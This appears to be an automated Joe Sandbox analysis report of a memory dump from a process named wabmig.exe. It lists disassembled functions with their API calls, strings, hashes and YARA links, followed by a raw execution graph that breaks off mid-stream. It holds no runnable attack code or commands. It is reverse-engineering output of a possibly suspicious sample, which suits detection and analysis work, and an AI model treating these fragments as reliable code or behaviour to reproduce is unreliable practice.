                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$memcpywcslen
                                                                            • String ID: "
                                                                            • API String ID: 1983396471-123907689
                                                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                            Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer_memicmpmemcpy
                                                                            • String ID: URL
                                                                            • API String ID: 2108176848-3574463123
                                                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                            Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfmemcpy
                                                                            • String ID: %2.2X
                                                                            • API String ID: 2789212964-323797159
                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                            Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf
                                                                            • String ID: %%-%d.%ds
                                                                            • API String ID: 3988819677-2008345750
                                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                            Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040E770
                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendmemset
                                                                            • String ID: F^@
                                                                            • API String ID: 568519121-3652327722
                                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                            Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PlacementWindowmemset
                                                                            • String ID: WinPos
                                                                            • API String ID: 4036792311-2823255486
                                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                            Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                            • String ID: _lng.ini
                                                                            • API String ID: 383090722-1948609170
                                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                            Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                            • API String ID: 2773794195-880857682
                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                            Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID:
                                                                            • API String ID: 438689982-0
                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                            Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$memset
                                                                            • String ID:
                                                                            • API String ID: 1860491036-0
                                                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                            Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040A908
                                                                            • free.MSVCRT ref: 0040A92B
                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocwcslen
                                                                            • String ID:
                                                                            • API String ID: 726966127-0
                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                            Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                            • free.MSVCRT ref: 0040B201
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040B224
                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocwcslen
                                                                            • String ID:
                                                                            • API String ID: 726966127-0
                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                            Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID:
                                                                            • API String ID: 231171946-0
                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                            Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                            • free.MSVCRT ref: 0040B0FB
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040B12C
                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocstrlen
                                                                            • String ID:
                                                                            • API String ID: 3669619086-0
                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                            Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                            • malloc.MSVCRT ref: 00417407
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                            • free.MSVCRT ref: 00417425
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 2605342592-0
                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                            Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcslen$wcscat$wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1961120804-0
                                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                            Execution Graph

                                                                            Execution Coverage:2.4%
                                                                            Dynamic/Decrypted Code Coverage:20.5%
                                                                            Signature Coverage:0.5%
                                                                            Total number of Nodes:845
                                                                            Total number of Limit Nodes:16
                                                                            execution_graph 34067 40fc40 70 API calls 34241 403640 21 API calls 34068 427fa4 42 API calls 34242 412e43 _endthreadex 34243 425115 76 API calls __fprintf_l 34244 43fe40 134 API calls 34071 425115 83 API calls __fprintf_l 34072 401445 memcpy memcpy DialogBoxParamA 34073 440c40 35 API calls 33201 444c4a 33220 444e38 33201->33220 33203 444c56 GetModuleHandleA 33204 444c68 __set_app_type __p__fmode __p__commode 33203->33204 33206 444cfa 33204->33206 33207 444d02 __setusermatherr 33206->33207 33208 444d0e 33206->33208 33207->33208 33221 444e22 _controlfp 33208->33221 33210 444d13 _initterm __getmainargs _initterm 33211 444d6a GetStartupInfoA 33210->33211 33213 444d9e GetModuleHandleA 33211->33213 33222 40cf44 33213->33222 33217 444dcf _cexit 33219 444e04 33217->33219 33218 444dc8 exit 33218->33217 33220->33203 33221->33210 33273 404a99 LoadLibraryA 33222->33273 33224 40cf60 33225 40cf64 33224->33225 33280 410d0e 33224->33280 33225->33217 33225->33218 33227 40cf6f 33284 40ccd7 ??2@YAPAXI 33227->33284 33229 40cf9b 33298 407cbc 33229->33298 33234 40cfc4 33316 409825 memset 33234->33316 33235 40cfd8 33321 4096f4 memset 33235->33321 33240 40d181 ??3@YAXPAX 33243 40d1b3 33240->33243 33244 40d19f DeleteObject 33240->33244 33241 407e30 _strcmpi 33242 40cfee 33241->33242 33245 40cff2 RegDeleteKeyA 33242->33245 33246 40d007 EnumResourceTypesA 33242->33246 33345 407948 free free 33243->33345 33244->33243 33245->33240 33248 40d047 33246->33248 33249 40d02f MessageBoxA 33246->33249 33252 40d0a0 CoInitialize 33248->33252 33326 40ce70 33248->33326 33249->33240 33250 40d1c4 33346 4080d4 free 33250->33346 33343 40cc26 strncat memset RegisterClassA CreateWindowExA 33252->33343 33253 40d1cd 33347 407948 free free 33253->33347 33258 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33344 40c256 PostMessageA 33258->33344 33259 40d061 ??3@YAXPAX 33259->33243 33263 40d084 DeleteObject 33259->33263 33260 40d09e 33260->33252 33263->33243 33265 40d0f9 GetMessageA 33266 40d17b CoUninitialize 33265->33266 33268 40d10d 33265->33268 33266->33240 33267 40d113 TranslateAccelerator 33267->33268 33269 40d16d GetMessageA 33267->33269 33268->33267 33270 40d145 IsDialogMessage 33268->33270 33271 40d139 IsDialogMessage 33268->33271 33269->33266 33269->33267 33270->33269 33272 40d157 TranslateMessage DispatchMessageA 33270->33272 33271->33269 33271->33270 33272->33269 33274 404ac4 GetProcAddress 33273->33274 33276 404ae8 33273->33276 33275 404add FreeLibrary 33274->33275 33277 404ad4 33274->33277 33275->33276 33278 404b13 33276->33278 33279 404afc MessageBoxA 33276->33279 33277->33275 33278->33224 33279->33224 33281 410d17 LoadLibraryA 33280->33281 33282 410d3c 33280->33282 33281->33282 33283 410d2b GetProcAddress 33281->33283 33282->33227 33283->33282 33285 40cd08 ??2@YAPAXI 33284->33285 33287 40cd26 33285->33287 33288 40cd2d 33285->33288 33355 404025 6 API calls 33287->33355 33290 40cd66 33288->33290 33291 40cd59 DeleteObject 33288->33291 33348 407088 33290->33348 33291->33290 33293 40cd6b 33351 4019b5 33293->33351 33296 4019b5 strncat 33297 40cdbf _mbscpy 33296->33297 33297->33229 33357 407948 free free 33298->33357 33302 407ddc 33311 407e04 33302->33311 33370 407a1f 33302->33370 33303 407a1f malloc memcpy free free 33305 407cf7 33303->33305 33305->33302 33305->33303 33306 407d7a free 33305->33306 33305->33311 33361 40796e 7 API calls 33305->33361 33362 406f30 33305->33362 33306->33305 33358 407a55 33311->33358 33312 407e30 33313 407e38 33312->33313 33315 407e57 33312->33315 33314 407e41 _strcmpi 33313->33314 33313->33315 33314->33313 33314->33315 33315->33234 33315->33235 33376 4097ff 33316->33376 33318 409854 33381 409731 33318->33381 33322 4097ff 3 API calls 33321->33322 33323 409723 33322->33323 33401 40966c 33323->33401 33415 4023b2 33326->33415 33332 40ced3 33504 40cdda 7 API calls 33332->33504 33333 40cece 33336 40cf3f 33333->33336 33456 40c3d0 memset GetModuleFileNameA strrchr 33333->33456 33336->33259 33336->33260 33339 40ceed 33483 40affa 33339->33483 33343->33258 33344->33265 33345->33250 33346->33253 33347->33225 33356 406fc7 memset _mbscpy 33348->33356 33350 40709f CreateFontIndirectA 33350->33293 33352 4019e1 33351->33352 33353 4019c2 strncat 33352->33353 33354 4019e5 memset LoadIconA 33352->33354 33353->33352 33354->33296 33355->33288 33356->33350 33357->33305 33359 407a65 33358->33359 33360 407a5b free 33358->33360 33359->33312 33360->33359 33361->33305 33363 406f37 malloc 33362->33363 33364 406f7d 33362->33364 33366 406f73 33363->33366 33367 406f58 33363->33367 33364->33305 33366->33305 33368 406f6c free 33367->33368 33369 406f5c memcpy 33367->33369 33368->33366 33369->33368 33371 407a38 33370->33371 33372 407a2d free 33370->33372 33374 406f30 3 API calls 33371->33374 33373 407a43 33372->33373 33375 40796e 7 API calls 33373->33375 33374->33373 33375->33311 33392 406f96 GetModuleFileNameA 33376->33392 33378 409805 strrchr 33379 409814 33378->33379 33380 409817 _mbscat 33378->33380 33379->33380 33380->33318 33393 44b090 33381->33393 33386 40930c 3 API calls 33387 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33386->33387 33388 4097c5 LoadStringA 33387->33388 33389 4097db 33388->33389 33389->33388 33391 4097f3 33389->33391 33400 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33389->33400 33391->33240 33392->33378 33394 40973e _mbscpy _mbscpy 33393->33394 33395 40930c 33394->33395 33396 44b090 33395->33396 33397 409319 memset GetPrivateProfileStringA 33396->33397 33398 409374 33397->33398 33399 409364 WritePrivateProfileStringA 33397->33399 33398->33386 33399->33398 33400->33389 33411 406f81 GetFileAttributesA 33401->33411 33403 409675 33404 4096ee 33403->33404 33405 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33403->33405 33404->33241 33412 409278 GetPrivateProfileStringA 33405->33412 33407 4096c9 33413 409278 GetPrivateProfileStringA 33407->33413 33409 4096da 33414 409278 GetPrivateProfileStringA 33409->33414 33411->33403 33412->33407 33413->33409 33414->33404 33506 409c1c 33415->33506 33418 401e69 memset 33545 410dbb 33418->33545 33421 401ec2 33575 4070e3 strlen _mbscat _mbscpy _mbscat 33421->33575 33422 401ed4 33560 406f81 GetFileAttributesA 33422->33560 33425 401ee6 strlen strlen 33427 401f15 33425->33427 33428 401f28 33425->33428 33576 4070e3 strlen _mbscat _mbscpy _mbscat 33427->33576 33561 406f81 GetFileAttributesA 33428->33561 33431 401f35 33562 401c31 33431->33562 33434 401f75 33574 410a9c RegOpenKeyExA 33434->33574 33435 401c31 7 API calls 33435->33434 33437 401f91 33438 402187 33437->33438 33439 401f9c memset 33437->33439 33440 402195 ExpandEnvironmentStringsA 33438->33440 33441 4021a8 _strcmpi 33438->33441 33577 410b62 RegEnumKeyExA 33439->33577 33586 406f81 GetFileAttributesA 33440->33586 33441->33332 33441->33333 33444 40217e RegCloseKey 33444->33438 33445 401fd9 atoi 33446 401fef memset memset sprintf 33445->33446 33449 401fc9 33445->33449 33578 410b1e 33446->33578 33449->33444 33449->33445 33450 402165 33449->33450 33451 402076 memset memset strlen strlen 33449->33451 33452 4070e3 strlen _mbscat _mbscpy _mbscat 33449->33452 33453 4020dd strlen strlen 33449->33453 33454 406f81 GetFileAttributesA 33449->33454 33455 402167 _mbscpy 33449->33455 33585 410b62 RegEnumKeyExA 33449->33585 33450->33444 33451->33449 33452->33449 33453->33449 33454->33449 33455->33444 33457 40c422 33456->33457 33458 40c425 _mbscat _mbscpy _mbscpy 33456->33458 33457->33458 33459 40c49d 33458->33459 33460 40c512 33459->33460 33461 40c502 GetWindowPlacement 33459->33461 33462 